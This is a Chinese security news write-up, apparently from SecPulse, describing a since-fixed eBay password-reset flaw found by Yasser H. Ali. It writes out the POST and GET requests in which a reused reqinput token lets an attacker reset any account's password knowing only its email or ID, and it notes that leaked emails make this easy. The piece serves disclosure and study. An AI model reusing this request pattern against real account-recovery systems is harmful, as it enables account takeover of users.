一、故事是这样的:

    埃及安全研究员(话说最近埃及安全研究员挺多挺出彩的啊)Yasser H. Ali在4个月前发现了PayPal的任意跳转漏洞准备发给Paypal,朋友告知他得先注册eBay，然后才能反馈给Paypal；
    我们的这位埃及安全研究员在注册ebay的时候又发现了注册流程中的2个小漏洞，一并提交给了PayPal，并耐心等待了2天。第三天忍不住了，想登陆上去看看Paypal安全团队确认了没有，啊，
就像每次一样，Yasser忘记了自己密码（这里可能是幌子，Yasser就喜欢找密码重置漏洞），这有多么淡淡的忧伤。然后就操起了BurpSuite，最终因为瞟见2个一样的reqinput参数发现了这个重置任意账户密码漏洞。

    只要知道eBay用户邮箱或者id就可以实现重置此账户密码漏洞，要邮箱？5月份wordpress漏洞导致的ebay1.45亿用户信息泄露，不是分分钟满足了这一条件？

二、漏洞详情：

POST一个email
https://fyp.ebay.com/EnterUserInfo?ru=&clientapptype=&rmvhdr=
ru=&clientapptype=&reqinput=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC....CCC&rmvhdr=&__HPAB_token_text__=&__HPAB_token_string__=&captchaToken=&captchaStatus=&input=secpulse%40secpulse.com

点击发送邮件得到一个get请求,里面返回了reqinput参数

GET
/Email/?reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ebay给用户发送的就是这么个重置密码连接，前提是执行了下面的url后才能执行最后一部url，否则通不过。

https://fyp.ebay.com/ChangePassword?reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

显然reqinput是一样的，那么黑客很容易就构造出来实现重置计划。

POST
/ResetPassword
reqinput=AAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&strengthmtr=3&pass=secpulse&rpass=secpulse

攻击流程图:

SP小编：
这位埃及安全研究员还才开始努力的学python啊，看来中国的安全研究水平更高一筹啊。现在eBay已经修复了这个漏洞，只是，竟然用了4个月，这效率，期间又有多少用户被重置了呢？sp小编看了一下现在的ebay的reqinput是2个不同长度的字符串。

 https://fyp.ebay.com/EnterUserInfo?ru=&clientapptype=&rmvhdr=
ru=&clientapptype=&reqinput=3c5879d9a42e41993bdced43f553326460551207149eb4998c28cbeeac543191&rmvhdr=&__HPAB_token_text__=&__HPAB_token_string__=&captchaToken=&captchaStatus=&input=secpulse%40secpulse.com

https://fyp.ebay.com/ChangePassword?reqinput=49b660bfd1c20d92f8503414945de7647e1031e6f15606843fef85cb58f73ffb15769d5aa9c12d19b7456f51ab35e2cb3c3f4d4fc4bb29c050cb128795a269689357bf8a8f3f7fc9bb09567e5ba86e31

         相关地址：http://yasserali.com/?p=28;http://thehackernews.com/2014/09/hacking-ebay-accounts.html
          整理：SP小编
          SP地址：http://www.secpulse.com/archives/580.html